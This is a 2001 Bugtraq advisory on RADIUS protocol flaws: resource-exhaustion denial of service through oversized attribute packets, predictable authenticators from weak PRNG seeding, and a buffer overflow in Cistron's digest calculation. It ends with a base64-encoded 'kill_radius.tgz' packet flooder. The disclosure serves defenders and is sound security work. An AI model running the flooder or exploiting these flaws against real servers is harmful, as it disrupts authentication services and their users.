[23121] in bugtraq
More problems with RADIUS (protocol and implementations)
daemon@ATHENA.MIT.EDU (3APA3A)
Tue Nov 13 08:57:10 2001
Content-Transfer-Encoding: 8bit
Date: Tue, 13 Nov 2001 14:50:14 +0300
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Reply-To: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Message-ID: <8617320960.20011113145014@SECURITY.NNOV.RU>
To: bugtraq@securityfocus.com
Cc: miquels@cistron.nl, Joshua Hill <josh-radius@untruth.org>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----------7E11520E3F0B8FBE"
------------7E11520E3F0B8FBE
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Hello bugtraq,
There are more problems in RADIUS protocol and some of implementations:
1. There is no way RADIUS server can validate Access-Request packet
really originated by NAS (RADIUS client) before (and even after, if
packet has no User-Password attribute) decoding all attributes. It opens
a possibility to spoof source IP for this kind of packets. I think this
is a major weakness in RADIUS protocol rather then all hard-to-exploit
cryptographic M-i-t-M issues.
Example: according to RFC 2865 each RADIUS packet can be up to 4096
bytes. It allows to put > 2000 attributes into a single packet. Most
RADIUS servers implementations allocate maximum attribute length for
each attributes, it means for each attributes > 256 bytes of memory will
be allocated. So, it's possible to lock >512K of memory and amount of
CPU time with a single 4K packet. Nice possibility to DoS.
Attached is simple flooder to flood server with packets like this. It
doesn't spoof source IP, so it can only be used to test your RADIUS
server (you must use it from IP registered as NAS).
2. RFC 2865 requires unpredictability of authenticator value in
Authentication Request packet. Many RADIUS servers and client libraries
implementations do not follow it. Many of them have code like
srand(time(0) + getpid()) (or even srand(time(0)) + rand(). As you know,
the number of rand() states is very limited and it's easy to predict the
state of PRNG. It opens possibility to spoof NAS Authentication Request.
For example Cistron RADIUS has this flow in proxy module. Many RADIUS
client libraries also have this flow.
3. Most of current freeware RADIUS server implementations (and some of
commerce ones) are derived from Cistron. And most of them (including
Cistron itself) have buffer overflow in digest calculation (in case of
Cistron itself it's static data overflow in calc_acctdigest() function).
This function adds shared secret to packet data to calculate digest, but
space for shared secret never allocated in buffer. If packet is exactly
of allocated size (in case of Cistron it's 1024 - they do not exactly
follow RFC) string pointer located after the buffer in memory will be
overwritten with shared secret. Probably this overflow can only lead to
DoS. Since overflow occurs before packet is checked, it can be exploited
from spoofed IP.
--
http://www.security.nnov.ru
/\_/\
{ . . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A }
+-------------o66o--+ /
|/
You know my name - look up my number (The Beatles)
------------7E11520E3F0B8FBE
Content-Type: application/x-compressed; name="kill_radius.tgz"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="kill_radius.tgz"
H4sIANAE8TsAA+067W7byrH5Sz3FNOk9oRTFluSP5NhxAMWWE+E4sivLaXsTg6DIlbTXFMlySTlu
mlfsQxToA/T0BTqzu/yWnaAX5xQXVwskFpezs/O187W84Z5nRbbLE7HlPPplRqfb6ezv7j7q4Hix
L//iTFc+499ur9d51Hmx82K31+nsvsD33f2dvb1H0PmF6CmNRMR2BPBo5dnuQ3B//fkf//z5Hz//
7Z9///nXIOvXGtutBrTgt0P3AG6KptBeQXeru9Xb2gHUSne78+N27yV0Xxz09g46e7DTv+jv9GHw
OYTfEoJx/2R4dQl9x2FCwJj9KWEiBjuOIz5NYgYzLwhcFhGo6TTT5Ys4Dg+2t29vb7cEc5KIx3db
vh+stqIEIbcbjcYT7jte4jJ47PGppm3xuDD/SsQuD7YWr8tTCE1zpcmI+/MyoBPfhaw85bPYnVbQ
3YltETg3LK7PEwKxZpovK3gTnyNZtb04/tvmfnnejkJ7m96Up5fuXm0n9pnHcn8aq4C7oORkIbDl
2J5jJr7gc5+54CzQzltBEodJ3IbKNPdptmEYQCN7yf0Y5CuP+c3DRkNaizFmcRL5YPswvADbdSPS
+SwKlvQy8BmIJAw9LtcDHi/ftSMX3CAGP4jtmAf+llRvguh3ehZuEVqExnQCH61GUxRaqLJm40vD
wL+JQ4RIKIP7SInBZ2CSjCw7DnxTQbfhB+434egIOk3kJVJ0Dkf9k5OxNTofDQ4b6STKXEh0h42v
jQcZQx6IN7BhEYiYwHx7ySCIihAPMzdncY0/Qlbkjp6ZHxutRYhUpqsNsFNmTRuOMknJ1U34zVGR
uwLP+apFiMuQAFoxvSPS08UoptHV2VlhlZlu2ywLrWGgfAzk/MKObD/gdiqRN9x3YZV4PovsKffo
/AL0fTr4Nh6YSC5yUJ5L2+dh4tnoCk5Gl4CMRpwJiAOShj9nEC8YoJHN4wUEM3qSS7WEEelwVgTh
wn8aw24bRLBE1vBgPxVwGwV4wGndtuJ9ET5/vbD0EhSV4H9mwSxnsglfvs27geZhLNnSCe/MH+w2
KKREWLuOMLcvu2hXZ/wGD0Uc+YikDegQwfZu7TtBFiTgU0cajDILhBrRVurJRS/ahqLZiMhpy2Pp
S+MhNn14rexd72CqVRKSTq3BPIHiNHw0hC4+0uuPPjyH7jXOdEi9mmh6o+hWhANMUObj02MQRO1u
58d9CJyYxQIV+rmNB8WFJRoThKRtnLUjUhEeiRi1Cr29/S2J5V1wy1YMBYaqEuAnyymLUIfwPxh8
wbOjOT7KFaRixMyXyRLeT67IFAhGIpEbSX9L03jyb4PoRrSBfXZYGOOyuynGGTyWcz5HY4wBDYNF
5EVVLBF0Oh0gZb3EY4mG7AZLa8WcOIisMAi8j/2ryTvrw+B4cj62zgajVu/6MFPhB9vjLpqvkDRG
KsCh3YGDjg7VMepfopUeo8eVVi7BaB05UhuFy2BqC/SIgWJSrRIQRnxFh+KG3Wkyn7hshn4NJDEX
/ctLIgXM7n4zJeU4YrTE1iyAYoGEUmEApndIicIrY0OJZzOVREs9K3tCD2TwQ/JKUlr07HLX0ltJ
cym+c4LEj1F72o7IHH+Tw9MBQ8MjpZhcwgCHV+S346Y+O3U1NBHo2TN1No01WuLX8OxIs2I24Qfo
fJ7NkCp5UMvEdvXx1d7rfeDy2R0ESZSKjhC2K5pRHLWV/0EDx+indS4ST6qc+8jRUvp6fBMFyXwB
70/21BIRAI/RG9mehzYpFog5DubSFlPfpLd49ozcxTfNULJrpoJW7DYLPrnvU2zFsxjQHkQILHBf
7UY12W1ytXO+Um6V5hOBwBUb2qIDj+eS+QItVp7iOPPFcgFiri5qwy3H6IJSQvwkHlyw1NLDw2lT
5F7a6OKRoFtE+FQGTElargQtGnI9uXVR2AqDKC7FTYpghbhpIFUriptGS6xCEgv+URGP3qiIhz4S
/2/D48QNH5NHlHaKgKUI0NHWoh/9OFgIE4GevxYWkdHUrpF8EB5S0IFbZaWWcoF4nL40IHMyajiY
+h7WZrmbznX300kVq+qwStI1y6gDoouyP+5ilYXvvlZJI/B0IB9SntNk9hH9tPR0JHK9RDDflTGo
pWd00KHEVv+m5D71GUDy0d5BYmHiKP1NqfPM1Q8x5kielbJpZImmK2KLhyofSzMiuZKmLLQXGgLD
yzKI2QMgLWEfGtlronZlewDxCtfMXGQrzkUQuTMMeA6+kZK4V8ZGVcPqh+LIgPIQNjKnmV03SEHW
wyDyqOv3hvTGMgFB2s0f1NZt6GTJh5qh1APBtBrSc/NYUZ6ZvHpN2XGqsIvfW5Lhq5ML6+J8PNGA
plIaAqjCx+yfWsPRYNKGy/Pjn6yTt+P+eyQCM6hXhKxwiJTLNRRVW2T5+S6D0WR43J8Mz0fWePC7
q8ElbachuSsNpmgf2p40QDa3wHxfmEVAxXtx5tmRufusosnm9+JKs73UvelF6eMatJhTZfarkvQ0
41cKkO5aUP5uasss2m0Lg1jBtJWqUQfK3zXRpNrw9FPnaapyRKKhZcIpbHRQWBvN7CX37nAPravC
K9pJlzv4vnzWNIi2ByUQ7e2QLxW6j3oUuV9R/nfYRGWnIpHeBoP19RE5g8N1L3raqWpEEo/yIirM
S9MppSUlcRMVBoUitER0SXGgLRMrvfQoFLVHByMtYmuyRllmcs6OT10fUqh4CkzaFquGknWopESZ
ek8lHUZuwjKif20UAooMGHSQlzb3Tek2oznm5dK14s/Vx2vEiX5Ze00M1XQOIPOw6W9VMKVP5BPw
F5oCoSMqd+Evf8EnXIGiwpKYmxJ771oVeh16jUsMU1deRaCdFKgpgxcyFOEmiPzxlaDAfQD/JUDG
2ajQ0pFu6pP/uA0SSee6eSgX544A4Cv+08/FwKJWdK/bmq22CiYkrv90P+z/2yi01X6xPb7R/93t
7exS/3d/Z+/F3j71grv7nb3dTf/31xjbLXQLrQ8sEljNHEi/KZvBBbvIWsG7qhXc7Wx3X0J392Bv
/6D7I5DgskbwdgMaT/jMp/z4bPhGtYWtd1lVW5zTPYbCTsal9May9pClVxSg96WSn+peGUNU3UDg
amEk62bCk/Jg/G/olywgXXnf2U7iAOuPGbWd8d0327/oOdfMsijy611q1bhOey3HC+bcyA6GhCFm
qGZ6pZvJbcxQI4F8lzrMsklj3zCf3k6xclqq3hzJKSWdum+J7alGAGoHJsP3A+v3Q8xjLv94adFT
4wmsb2Dn09mUbCc9oejzrv9hkKEgLcN9WPSaNdiw2MSqHLHKPwXB593+fC4OkFN9ATAjG7sc/vfg
/NS6Gl0O344GJ5j4TCSHa+ZllMR9ogglfNqf9M8OsgZeod/dTOHKZGHmriz4w2B0cj42PzezfN38
DK9fg2zQpGY+6F9Yl5P+eFJJ7XuV/k6eRhpGdz97d/wO13/on10N6NXbyTu9vADyvv8H3GE8HL1V
q3t7uwae5fHpca+78/IA1HUHdJ739nbSnl2xvVRN/KtFSHd/d68EfHw8eQh4P1OJlZ3xgtTkXu9O
NKu9Tk2gF4Nj6+pybBi7vR/XSdswcjHnr08Gb67eUo2EyYq++HDZNJk3QaUwBVA5jzUcj0ys+w03
gC9QX/YFPlGGhylQElOOZj79FD9tHqazq9CSiDFtdAO6RkFUh/Ulfr5EyuerfvgKtwvuMbPTzAyr
0kxwuUM3GpjFfVFlKa6i3gXW9Ne64DQMnWyrB0KQPawQa1AooTN0Rstnn6m3CydDVGR/Mhkfrt8c
6+WErd9dzxC+h2mSOCpUyLkKGdLE76NDslIgRE3UNlbTIXMqM6rpYtRRVmmQFlYnQtIr7eVbqpDp
8Hp96EYH4MkMJGYlXWoCZjc8hpeK6wyPjTU5/4mOSBCyCDP0XKZYnVBZpu+GXtJCI0X4sewNrnO+
cy5ytpVjuegPx9mNniq2Dgwju7lNMIBgneYQDfq2R97tPtetb13pybhsXCSx7ulRn/sO1IEiDeg7
AurzT5lspSo4tQ7jfIj1JtPXx0jT8U+DCdgCbpnn4QoMhlho2J5HvoywUvmgwjTSHPEZZ+6Bcco9
T102lvaWoRSppjoF11coFxoNlarttCtzYFxRK3jK4lvGZM1iRcxZSSZyxCqQPtQGhLSVbmTdr1zf
InLy+jufLpXliSUWqG1DQaeKzyYJVk+qbbib/dSGn1vJ/Y0tCsISRBbksb0MC4dISbeEqUVyykAK
razcpBBoFQoys5JOM0u7IPdJ2pwlvkMd9ML9BB4F5YyFPWPKz6a30219FY3btfObbDUbpNfTaUMt
9dJCOR1zLXy7cA4AaW7TK5d5fMljEa/D9n14cKXiJYsVp8OzAbTKcDUoj4t7IXUYxgRYgkqHTqxl
pKXCPeFSpJgUV8UrNaaigesqP1jrqiuupMgU+/kK2vE+eIlM/aYj8QAWrY0KGnlvrx5pG/m4HgX3
efkuwOVR+XZ0RmaQRTi01zT+Te/U5lnj+j4weUFeRFmElnrR4IhveiflkuLMyL4XXCLPwYvbqGU5
r3kQk7dl9VcY8e55U2NBXpkcygQNuhSLTod/eD84wP2XoR3LoiBNklJBzFlsVIVXh8In16gIrwyF
C3OgTAZorlWobMNMrmB78sqXrsv9IIY/JTxmRKvOnJAP+iLGkWltyX3k375YSgBtKP5SUqP1i6Xt
FBCAR6tpklBoEVY+lIkxiGpjx1/k/nTDcS30DbtTwPijAFuBcvmciZSm9AOs7NSmYc8sB8lWaj/3
TOvPBZgTMUJdgjJaaWST1jhzUyvKY1x1t7TbKtGiE4z4nPu29/27YRAPpMWCz26z5q7SG72fRay2
aatIV3jLfEmZ2gsfwlsl3JaKCjVCKics3bOAUfNaw/hvIsT50NJUPiS/7CssGdTcssMPbSFugyjT
CVmyhWlMrMzkXsR1aqnm0BZGSU7KmTY0eaYpM1S2VgjhLZp15FcGFedGDj7TGkFJrRWpJ5VVUZEH
KAFJZCU8GHhZXMFUh8IYUgWphMoaF0F4Z9YC9DqoXgWscMlZJGEZrCpkxkGZihZly7U1ve9YVNqy
SuPSvqkHJll61AJJooNwWkOswYbKdbXZt8JUuy1GX180CmUI3fmHdiTSIzJNZjP6jqdMOo8oHUWs
+SeCA9llqSQh9QZByW17wbzEYBu2traa2Srr7ejq2LLQqC0r492ywDTV1xhgqpq/Dd029JrNrMY+
TH+UdgtlI+gX2hBDA4t8iTbdD7fD1ObjdfaSDnfafAhcX6x9QV2JTKiX9BEVpn0LLEfuYMmFg1WS
7bMgEVVRK4awLggt+tpPfQSR6VDdflkUW2fS1RU+VqQCBPWY1SX5ZSaUhIUwhU38OLDNLMSm38OV
0dQ+gdQo6NON7//qrRgzvOCWRY6dmaeIyzElWgp0j+vf3vcllE6UyAL6l8eD0Yn1Zjjqj/9ILnPG
PdRQMTirmTeccm6z7MWruSkezCIFOpWf1peS70nzlfTA5a5b2RhmcSXqZGtPUS2bsmfnx/0z63J0
MR6OJqflrrMdyc+g5bcZvjLhXEKZaciyuZJdL2N1RFRxtPo3Vq+wYuRC3oJmvDRyngrXA8jRf/pu
ZDM2YzM2YzM2YzM2YzM2YzM2YzM2YzM2YzM2YzM2YzM2YzM2YzM2YzM2YzM24//K+BfMiG/TAFAA
AA==
------------7E11520E3F0B8FBE--
